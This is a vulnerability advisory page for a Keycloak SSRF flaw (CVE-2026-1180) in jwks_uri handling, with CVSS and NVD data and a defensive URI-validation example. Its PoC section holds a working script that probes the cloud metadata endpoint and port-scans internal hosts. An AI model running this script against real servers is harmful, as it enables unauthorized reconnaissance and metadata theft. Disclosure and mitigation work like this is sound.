Security Vulnerability Report

CVE-2026-1180

Published: 2026-01-20 13:16:03
Last Modified: 2026-04-15 00:35:42

Description

A flaw was identified in Keycloak’s OpenID Connect Dynamic Client Registration feature when clients authenticate using private_key_jwt. The issue allows a client to specify an arbitrary jwks_uri, which Keycloak then retrieves without validating the destination. This enables attackers to coerce the Keycloak server into making HTTP requests to internal or restricted network resources. As a result, attackers can probe internal services and cloud metadata endpoints, creating an information disclosure and reconnaissance risk.
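The control the description says is missing is a destination policy on the client-supplied jwks_uri: the server should only fetch a key set from an https URL whose host resolves to global unicast addresses, and should refuse loopback, link-local (which covers the 169.254.169.254 cloud metadata address), RFC 1918, ULA, multicast and other non-routable space. The following is an added example, not Keycloak's code; it assumes a registration handler can call validate_jwks_uri() before the key set is fetched, and the function names, the injectable resolver hook and the address 11.22.33.44 used as a stand-in for a public DNS answer are constructed for the example.

```python
# Added example: destination policy for a client-supplied jwks_uri (CWE-918).
# Not Keycloak code. Assumes the registration handler calls validate_jwks_uri()
# before the server fetches anything; the resolver hook exists so the policy
# can be exercised offline with constructed DNS answers.
import ipaddress
import socket
from urllib.parse import urlsplit


class JwksUriRejected(ValueError):
    """Raised when a jwks_uri points somewhere the server must not fetch from."""


def _is_forbidden_address(ip) -> bool:
    """True for loopback, link-local (169.254/16 metadata), RFC 1918, ULA,
    documentation, reserved, unspecified and multicast addresses."""
    # Unwrap ::ffff:a.b.c.d so IPv4-mapped IPv6 literals get the IPv4 rules
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    # is_global already excludes private/loopback/link-local/reserved space;
    # multicast is checked separately because it is not flagged by is_global
    return (not ip.is_global) or ip.is_multicast


def _resolve(host: str) -> list:
    """Default resolver: every A/AAAA answer for host as address strings."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def validate_jwks_uri(uri: str, resolver=_resolve) -> str:
    """Return uri unchanged if it is an https URL whose host is, or resolves
    only to, global unicast addresses; raise JwksUriRejected otherwise.

    Every resolved address is checked, not just the first, so a record set
    that mixes a public address with an internal one is rejected as a whole.
    """
    parts = urlsplit(uri)
    if parts.scheme != "https":
        raise JwksUriRejected(f"scheme must be https, got {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise JwksUriRejected("userinfo is not allowed in jwks_uri")
    host = parts.hostname  # brackets around IPv6 literals are already stripped
    if not host:
        raise JwksUriRejected("jwks_uri has no host")

    # IP literal (v4, v6 or mapped v6): judge it directly, no DNS involved
    try:
        literal = ipaddress.ip_address(host)
    except ValueError:
        literal = None
    if literal is not None:
        if _is_forbidden_address(literal):
            raise JwksUriRejected(f"{host} is not a global unicast address")
        return uri

    # Hostname: resolve and judge every answer
    try:
        answers = list(resolver(host))
    except (socket.gaierror, OSError) as exc:
        raise JwksUriRejected(f"could not resolve {host}: {exc}") from exc
    if not answers:
        raise JwksUriRejected(f"{host} resolved to no addresses")
    for answer in answers:
        addr = ipaddress.ip_address(str(answer))
        if _is_forbidden_address(addr):
            raise JwksUriRejected(f"{host} resolves to non-global address {addr}")
    return uri


def is_safe_jwks_uri(uri: str, resolver=_resolve) -> bool:
    """Boolean wrapper around validate_jwks_uri for policy checks and tests."""
    try:
        validate_jwks_uri(uri, resolver=resolver)
        return True
    except JwksUriRejected:
        return False


if __name__ == "__main__":
    # Constructed sample registrations; the lambda stands in for DNS
    public_dns = lambda host: ["11.22.33.44"]  # constructed public answer
    for candidate in [
        "https://keys.example.com/jwks.json",
        "http://169.254.169.254/latest/meta-data/",
        "https://10.0.0.1:6379/",
        "https://[::ffff:169.254.169.254]/",
    ]:
        print(f"{candidate:45s} -> {'accept' if is_safe_jwks_uri(candidate, public_dns) else 'reject'}")
```

Validating at registration time is necessary but not sufficient: a hostname can resolve to a public address when the URI is stored and to an internal one when Keycloak later fetches the keys, so the same address policy has to be applied to the address the HTTP client actually connects to, on every redirect hop as well, and the fetch should run with redirects disabled or re-validated.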

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak < 25.x.x (requires official confirmation)
All versions of the Keycloak OpenID Connect Dynamic Client Registration feature

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-1180 Keycloak SSRF via jwks_uri PoC
# Target: Keycloak server with Dynamic Client Registration enabled
import requests

KEYCLOAK_URL = "http://target-keycloak:8080"
REALM = "master"


# PoC 1: Basic SSRF test - probe internal metadata endpoint
def create_malicious_client_ssrf():
    """Create a client with malicious jwks_uri pointing to internal resource"""
    endpoint = f"{KEYCLOAK_URL}/auth/realms/{REALM}/clients-registrations/openid"

    # Malicious payload - target AWS metadata endpoint
    malicious_jwks_uri = "http://169.254.169.254/latest/meta-data/"

    client_data = {
        "client_id": "malicious_client_ssrf_test",
        "client_name": "SSRF Test Client",
        "redirect_uris": ["https://attacker.com/callback"],
        "jwks_uri": malicious_jwks_uri,
        "token_endpoint_auth_method": "private_key_jwt",
        "response_types": ["code"]
    }

    headers = {"Content-Type": "application/json"}

    try:
        response = requests.post(endpoint, json=client_data, headers=headers, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None


# PoC 2: Internal port scanning
def scan_internal_ports():
    """Scan internal services by specifying different jwks_uri ports"""
    internal_ips = ["10.0.0.1", "172.16.0.1", "192.168.1.1"]
    common_ports = [22, 80, 443, 3306, 5432, 6379, 8080, 9200]
    results = []

    for ip in internal_ips:
        for port in common_ports:
            jwks_uri = f"http://{ip}:{port}/"
            client_data = {
                "client_id": f"scan_{ip}_{port}",
                "jwks_uri": jwks_uri,
                "token_endpoint_auth_method": "private_key_jwt"
            }
            endpoint = f"{KEYCLOAK_URL}/auth/realms/{REALM}/clients-registrations/openid"

            try:
                response = requests.post(endpoint, json=client_data, timeout=5)
                # Fast response may indicate open port
                if response.elapsed.total_seconds() < 2:
                    results.append({"ip": ip, "port": port, "status": "possibly_open"})
                    print(f"[+] {ip}:{port} - Possibly open (response time: {response.elapsed.total_seconds()}s)")
            except requests.exceptions.Timeout:
                print(f"[-] {ip}:{port} - Timeout (filtered)")
            except Exception as e:
                print(f"[-] {ip}:{port} - Error: {e}")

    return results


if __name__ == "__main__":
    print("[*] CVE-2026-1180 Keycloak SSRF PoC")
    print("[*] Testing AWS metadata endpoint SSRF...")
    create_malicious_client_ssrf()
    print("\n[*] Scanning internal services...")
    scan_internal_ports()
```

References

https://access.redhat.com/errata/RHSA-2026:6477
https://access.redhat.com/errata/RHSA-2026:6478
https://access.redhat.com/security/cve/CVE-2026-1180
https://bugzilla.redhat.com/show_bug.cgi?id=2430781

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-1180", "sourceIdentifier": "[email protected]", "published": "2026-01-20T13:16:03.003", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was identified in Keycloak’s OpenID Connect Dynamic Client Registration feature when clients authenticate using private_key_jwt. The issue allows a client to specify an arbitrary jwks_uri, which Keycloak then retrieves without validating the destination. This enables attackers to coerce the Keycloak server into making HTTP requests to internal or restricted network resources. As a result, attackers can probe internal services and cloud metadata endpoints, creating an information disclosure and reconnaissance risk."}, {"lang": "es", "value": "Se identificó un fallo en la característica de registro dinámico de clientes de OpenID Connect de Keycloak cuando los clientes se autentican usando private_key_jwt. El problema permite a un cliente especificar una jwks_uri arbitraria, que Keycloak luego recupera sin validar el destino. Esto permite a los atacantes forzar al servidor de Keycloak a realizar solicitudes HTTP a recursos de red internos o restringidos. Como resultado, los atacantes pueden sondear servicios internos y puntos finales de metadatos en la nube, creando un riesgo de revelación de información y reconocimiento."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-1180", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430781", "source": "[email protected]"}]}}
```